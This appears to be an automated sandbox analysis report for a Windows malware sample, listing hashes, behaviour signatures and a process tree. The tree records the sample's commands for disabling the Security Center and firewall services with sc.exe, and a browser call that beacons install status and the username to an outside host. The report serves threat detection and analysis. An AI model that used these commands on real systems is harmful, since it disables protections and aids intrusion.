Analysis

  • max time kernel
    68s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    06/12/2022, 12:49

General

  • Target

    c81d87c6da0c01a6188c733a0d2c80b8db9870956c23eb111f4731ad23066665.exe

  • Size

    32KB

  • MD5

    1598053c6a90319c32d27558ca266fc4

  • SHA1

    3429d5e9c28aa6fc9bd559bed59daf5b2bf7a845

  • SHA256

    c81d87c6da0c01a6188c733a0d2c80b8db9870956c23eb111f4731ad23066665

  • SHA512

    e452cd151a1ae5ef35d77a8a39d8dfddb1583abff7d432aa0317c6fcf1f17088cbc795f60c8023278553393b332c13b39eaa63a405d6637c1f5263ae53bbe347

  • SSDEEP

    384:8op9GfTctITeq01NQMcqEdeepsShwknCiZp:8ogsNQ3p3wknCEp

Score
10/10

Malware Config

Signatures

  • Disables service(s) 2 TTPs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies service settings 1 TTPs

    Alters the configuration of existing services.

  • Stops running service(s) 3 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c81d87c6da0c01a6188c733a0d2c80b8db9870956c23eb111f4731ad23066665.exe
    "C:\Users\Admin\AppData\Local\Temp\c81d87c6da0c01a6188c733a0d2c80b8db9870956c23eb111f4731ad23066665.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Adds Run key to start application
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1900
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop wscsvc sc config wscsvc start=disabled
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1924
      • C:\Windows\SysWOW64\sc.exe
        sc stop wscsvc sc config wscsvc start=disabled
        3⤵
        • Launches sc.exe
        PID:1756
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop sharedAccess sc config sharedAccess start=disabled
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1136
      • C:\Windows\SysWOW64\sc.exe
        sc stop sharedAccess sc config sharedAccess start=disabled
        3⤵
        • Launches sc.exe
        PID:1444
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.facebook.eu.tp/update.php?datos=<br><b>...:::.12/11/2022 1:57:09 AM:::...<br>Instalacion Completa<br></b>&user=Admin
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1120
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1120 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1732

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\WC027F39.txt

    Filesize

    603B

    MD5

    6a962ec1a26f1cb951ec66c6641de900

    SHA1

    58bbe0316bb5ac8ba4273543b9e314b1651779f2

    SHA256

    81ce78f10d181f7d0d1b7458ebb3fa3af64c63897322995eb8284c8d68fe1f8a

    SHA512

    02d1855a33b92943f1537f6acee96d8616f15b76f3c6bc46355aaf362cb5fe843f1dc48d006f603d9a3b409a35d8b4fd62caa5d9456e63a4efd822b0d5eac2ae

  • memory/1900-56-0x0000000075A81000-0x0000000075A83000-memory.dmp

    Filesize

    8KB